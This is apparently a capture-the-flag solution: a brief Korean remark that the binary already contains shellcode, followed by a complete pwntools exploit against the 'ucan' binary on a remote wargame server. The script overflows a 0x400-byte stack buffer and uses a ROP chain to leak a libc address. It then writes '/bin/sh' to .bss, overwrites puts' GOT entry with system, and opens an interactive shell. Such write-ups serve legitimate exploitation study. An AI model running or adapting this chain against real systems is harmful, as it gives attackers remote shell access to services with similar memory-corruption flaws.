사실 요문제는 이렇게 귀찮게 ROP를 하지 않아도 된다... ㅠㅠ 바이너리를 잘 살펴보면 쉘코드가 뙇 박혀있다..
from pwn import *
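# Local debugging alternative (kept for reference): run the binary with the
# target's libc preloaded so the offsets below match.
#s = process("./ucan",env={'LD_PRELOAD':'./libc'})
s = remote("kshgroup.kr",19192)
libc = ELF("./libc")   # must be the remote's libc: every offset below comes from it
elf = ELF("./ucan")    # fixed addresses below assume the binary is not PIE
#gdb.attach(s,'b *0x40073E')

# ROP gadgets taken from ./ucan (the two look like the usual __libc_csu_init tail).
# They are only valid for this exact build of the binary.
pop_rdi = 0x004007b3
pop_rsi_r15 = 0x004007b1

# Stack overflow: 0x400-byte buffer + 8 bytes of saved rbp, then the chain
# (assumes no stack canary between the buffer and the return address).
pay = "A"*0x400
pay += "B"*8
# 1) puts(read@GOT) -> leaks read's libc address
pay += p64(pop_rdi)
pay += p64(elf.got['read'])
pay += p64(elf.plt['puts'])
# 2) read(0, bss+0x10, rdx) -> stash "/bin/sh\0" in .bss
#    (the count is whatever rdx holds after puts; presumed > 8)
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(elf.plt['read'])
# 3) read(0, puts@GOT, rdx) -> overwrite puts' GOT slot with system
#    (needs a writable GOT, i.e. not Full RELRO)
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['puts'])
pay += p64(0)
pay += p64(elf.plt['read'])
# 4) puts(bss+0x10) now goes through the patched slot -> system("/bin/sh")
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['puts'])
s.send(pay)

s.recvuntil("Your name : ")
# recvn(6): plain recv(6) may return fewer bytes if the leak arrives in pieces,
# which would silently produce a wrong base address.
read_libc = u64(s.recvn(6).ljust(8, "\x00"))
print "read : " + hex(read_libc)
libc_base = read_libc - libc.symbols['read']
print "libc_base : " + hex(libc_base)
# A libc base is always page aligned; anything else means a bad leak or the
# wrong ./libc for this target.
if libc_base & 0xfff:
    log.warning("libc_base is not page aligned: wrong libc or bad leak?")
# one_gadget candidate: libc-version specific and not used by this chain.
one_shot = libc_base + 0x10a38c
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']
print "system : " + hex(system)

# The two read()s print no prompt, so the sleep is what keeps the second send
# from being coalesced into the first read (which would read p64(system) into
# .bss instead of the GOT). Increase it on a slow link.
s.send("/bin/sh\x00")
sleep(0.5)
s.send(p64(system))
s.interactive()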